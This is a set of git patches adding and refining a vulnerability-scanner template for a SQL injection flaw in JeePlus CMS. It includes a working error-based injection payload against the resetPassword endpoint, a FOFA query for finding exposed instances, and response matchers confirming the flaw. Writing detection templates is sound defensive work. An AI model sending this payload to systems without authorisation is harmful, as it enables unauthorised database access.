From 0d1defaf6bcf6c6cb34de101a41e360669b8bfd8 Mon Sep 17 00:00:00 2001
From: fkalis <110553194+WingBy-Fkalis@users.noreply.github.com>
Date: Mon, 23 Dec 2024 15:31:14 +0800
Subject: [PATCH 1/5] Add jeeplus-cms-resetpassword-sqli

Add jeeplus-cms-resetpassword-sqli
There is a SQL injection vulnerability in the jeeplus CMS resetpassword interface
---
 .../jeeplus-cms-resetpassword-sqli            | 23 +++++++++++++++++++
 1 file changed, 23 insertions(+)
 create mode 100644 http/vulnerabilities/jeeplus-cms-resetpassword-sqli

diff --git a/http/vulnerabilities/jeeplus-cms-resetpassword-sqli b/http/vulnerabilities/jeeplus-cms-resetpassword-sqli
new file mode 100644
index 00000000000..84914ba84ea
--- /dev/null
+++ b/http/vulnerabilities/jeeplus-cms-resetpassword-sqli
@@ -0,0 +1,23 @@
+id: jeeplus-cms-resetpassword-sqli
+
+info:
+  name: jeeplus-cms-resetpassword-sqli
+  author: WingBy_fkalis
+  severity: high
+  description: There is a SQL injection vulnerability in the jeeplus CMS resetpassword interface
+  tags: jeecg,sqli
+  metadata:
+    fofa-qeury:  (body="jeeplus.js" && body="/static/common/") || title="JeePlus 快速开发平台"
+
+http:
+  - raw:
+      - |              
+        GET /a/sys/user/resetPassword?mobile=13588888888%27and%20(updatexml(1,concat(0x7e,(select%20md5(123456)),0x7e),1))%23 HTTP/1.1
+        Host: 
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36
+          
+    matchers:     
+      - type: dsl
+        name: sqli
+        dsl:
+          - "status_code == 200 && contains(body,'e10adc3949ba59abbe56e057f20f883') && contains(body,'XPATH')" 

From 2173326040a8f2f091643b4016707f7d0d4da354 Mon Sep 17 00:00:00 2001
From: fkalis <110553194+WingBy-Fkalis@users.noreply.github.com>
Date: Mon, 23 Dec 2024 15:43:52 +0800
Subject: [PATCH 2/5] Rename jeeplus-cms-resetpassword-sqli to
 jeeplus-cms-resetpassword-sqli.yaml

---
 ...cms-resetpassword-sqli => jeeplus-cms-resetpassword-sqli.yaml} | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 rename http/vulnerabilities/{jeeplus-cms-resetpassword-sqli => jeeplus-cms-resetpassword-sqli.yaml} (100%)

diff --git a/http/vulnerabilities/jeeplus-cms-resetpassword-sqli b/http/vulnerabilities/jeeplus-cms-resetpassword-sqli.yaml
similarity index 100%
rename from http/vulnerabilities/jeeplus-cms-resetpassword-sqli
rename to http/vulnerabilities/jeeplus-cms-resetpassword-sqli.yaml

From 9f736c7a3c17f68541f1b15245c5c390acb7bdc0 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Sun, 29 Dec 2024 20:38:58 +0530
Subject: [PATCH 3/5] updated template

---
 .../jeeplus-cms-resetpassword-sqli.yaml       | 27 ++++++++++++-------
 1 file changed, 17 insertions(+), 10 deletions(-)

diff --git a/http/vulnerabilities/jeeplus-cms-resetpassword-sqli.yaml b/http/vulnerabilities/jeeplus-cms-resetpassword-sqli.yaml
index 84914ba84ea..ced6f2c35a2 100644
--- a/http/vulnerabilities/jeeplus-cms-resetpassword-sqli.yaml
+++ b/http/vulnerabilities/jeeplus-cms-resetpassword-sqli.yaml
@@ -1,23 +1,30 @@
 id: jeeplus-cms-resetpassword-sqli
 
 info:
-  name: jeeplus-cms-resetpassword-sqli
+  name: JeePlus CMS - SQL Injection
   author: WingBy_fkalis
   severity: high
   description: There is a SQL injection vulnerability in the jeeplus CMS resetpassword interface
-  tags: jeecg,sqli
+  reference:
+    - https://github.com/wy876/wiki/blob/main/JeePlus%E4%BD%8E%E4%BB%A3%E7%A0%81%E5%BC%80%E5%8F%91%E5%B9%B3%E5%8F%B0/JeePlus%E4%BD%8E%E4%BB%A3%E7%A0%81%E5%BC%80%E5%8F%91%E5%B9%B3%E5%8F%B0%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
+    - http://www.cstam.oyg.cn/detail/429410
   metadata:
-    fofa-qeury:  (body="jeeplus.js" && body="/static/common/") || title="JeePlus 快速开发平台"
+    verified: true
+    max-request: 1
+    fofa-query: body="jeeplus.js" && body="/static/common/"
+  tags: jeeplus,jeecg,sqli
+
+variables:
+  num: "999999999"
 
 http:
-  - raw:
-      - |              
-        GET /a/sys/user/resetPassword?mobile=13588888888%27and%20(updatexml(1,concat(0x7e,(select%20md5(123456)),0x7e),1))%23 HTTP/1.1
-        Host: 
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36
+  - method: GET
+    path:
+      - "{{BaseURL}}/a/sys/user/resetPassword?mobile=13588888888%27and%20(updatexml(1,concat(0x7e,(select%20md5({{num}})),0x7e),1))%23"
           
     matchers:     
       - type: dsl
-        name: sqli
         dsl:
-          - "status_code == 200 && contains(body,'e10adc3949ba59abbe56e057f20f883') && contains(body,'XPATH')" 
+          - "status_code == 200"
+          - "contains_all(body,'c8c605999f3d8352d7bb792cf3fdb25', 'XPATH')"
+        condition: and

From 5194ccda7067c421362e5ee0e09d60f850883e29 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Sun, 29 Dec 2024 20:44:02 +0530
Subject: [PATCH 4/5] lint fix

---
 http/vulnerabilities/jeeplus-cms-resetpassword-sqli.yaml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/http/vulnerabilities/jeeplus-cms-resetpassword-sqli.yaml b/http/vulnerabilities/jeeplus-cms-resetpassword-sqli.yaml
index ced6f2c35a2..217eae2b3f1 100644
--- a/http/vulnerabilities/jeeplus-cms-resetpassword-sqli.yaml
+++ b/http/vulnerabilities/jeeplus-cms-resetpassword-sqli.yaml
@@ -21,8 +21,8 @@ http:
   - method: GET
     path:
       - "{{BaseURL}}/a/sys/user/resetPassword?mobile=13588888888%27and%20(updatexml(1,concat(0x7e,(select%20md5({{num}})),0x7e),1))%23"
-          
-    matchers:     
+
+    matchers:
       - type: dsl
         dsl:
           - "status_code == 200"

From 949da1192c47310590b4e71af872da71b7210484 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Thu, 2 Jan 2025 14:56:42 +0530
Subject: [PATCH 5/5] Update and rename
 http/vulnerabilities/jeeplus-cms-resetpassword-sqli.yaml to
 http/vulnerabilities/other/jeeplus-cms-resetpassword-sqli.yaml

---
 .../{ => other}/jeeplus-cms-resetpassword-sqli.yaml            | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)
 rename http/vulnerabilities/{ => other}/jeeplus-cms-resetpassword-sqli.yaml (78%)

diff --git a/http/vulnerabilities/jeeplus-cms-resetpassword-sqli.yaml b/http/vulnerabilities/other/jeeplus-cms-resetpassword-sqli.yaml
similarity index 78%
rename from http/vulnerabilities/jeeplus-cms-resetpassword-sqli.yaml
rename to http/vulnerabilities/other/jeeplus-cms-resetpassword-sqli.yaml
index 217eae2b3f1..649bf0db8fb 100644
--- a/http/vulnerabilities/jeeplus-cms-resetpassword-sqli.yaml
+++ b/http/vulnerabilities/other/jeeplus-cms-resetpassword-sqli.yaml
@@ -4,7 +4,8 @@ info:
   name: JeePlus CMS - SQL Injection
   author: WingBy_fkalis
   severity: high
-  description: There is a SQL injection vulnerability in the jeeplus CMS resetpassword interface
+  description: |
+    A SQL injection vulnerability exists in the JeePlus low-code development platform, allowing attackers to manipulate database queries.This can lead to unauthorized data access, modification, or potential compromise of the application.
   reference:
     - https://github.com/wy876/wiki/blob/main/JeePlus%E4%BD%8E%E4%BB%A3%E7%A0%81%E5%BC%80%E5%8F%91%E5%B9%B3%E5%8F%B0/JeePlus%E4%BD%8E%E4%BB%A3%E7%A0%81%E5%BC%80%E5%8F%91%E5%B9%B3%E5%8F%B0%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
     - http://www.cstam.oyg.cn/detail/429410